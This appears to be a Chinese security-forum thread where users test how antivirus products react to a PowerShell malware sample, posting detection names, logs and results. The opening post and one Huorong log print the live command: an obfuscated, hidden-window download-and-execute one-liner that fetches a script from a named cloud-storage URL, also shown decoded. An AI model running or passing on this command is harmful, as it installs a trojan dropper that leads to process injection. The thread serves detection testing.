ps1 1x

wwwab

1. powershell -w h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYXNnYnVja2V0Lm9zcy1hcC1zb3V0aGVhc3QtMy5hbGl5dW5jcy5jb20vY2xhc3MvaW5pdGlhdGUvQk1CMXRjVGYudHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"

复制代码

1. iex (iwr 'https://asgbucket.oss-ap-southeast-3.aliyuncs.com/class/initiate/BMB1tcTf.txt' -UseBasicParsing).Content

复制代码

https://www.virustotal.com/gui/f ... f4d90a663/detection

swizzer

1. D:\1@Malware\BMB1tcTf.txt - PowerShell/TrojanDropper.Agent.AMM 特洛伊木马
   
2. AMSI 扫描程序;文件;script;PowerShell/TrojanDownloader.Agent.JWG 特洛伊木马

复制代码

877906025Z

事件: 检测到恶意对象
用户: LAPTOP-000000
用户类型: 发起者
应用程序名称: powershell.exe
应用程序路径: C:\Windows\System32\WindowsPowerShell\v1.0
组件: AMSI 保护
结果说明: 检测到
类型: 木马
名称: HEUR:Trojan.PowerShell.Generic
精确度: 不确切
威胁级别: 高
对象类型: 文件
对象名称: amsi_stream_39
对象路径: uid://
对象的 MD5: CD1C371AEA8503E877CD8012651815A1
原因: 专家分析
数据库发布日期: 今天，2024/12/12 下午12:09:00

aboringman

360：0

Update：其实事情比较复杂，我不知道有没有人能够解释这个现象（

首先，我试图跑powershell，会



放行之后跑一段时间，当内存达到1900左右mb时，过不了多久，360的主页修复就会提示让我用系统急救箱进行处理（？？？？？？），此时powershell仍在运行



火绒：击杀下来的东西

1. 病毒名称：HVM:TrojanDropper/Maloader.j
   
2. 病毒ID：A226E4C23E724E84
   
3. 病毒路径：C:\Users\123aaa\AppData\Roaming\UjuhFtP4\hhh.exe
   
4. 操作类型：修改
   
5. 操作结果：已处理，删除文件
   
6. 
   
7. 进程ID：5604
   
8. 操作进程：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   
9. 操作进程命令行："C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYXNnYnVja2V0Lm9zcy1hcC1zb3V0aGVhc3QtMy5hbGl5dW5jcy5jb20vY2xhc3MvaW5pdGlhdGUvQk1CMXRjVGYudHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"
   
10. 父进程ID：4676
    
11. 父进程：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

复制代码

powershell仍在运行

---

天守



放行



再放行就出问题了，hhh.exe跑起来了，然后某个系统程序被注入了。。。。。。

Loyisa

BD拦截恶意脚本

biue

腾讯电脑管家 1X

yaokai815

火绒 瑞星均0x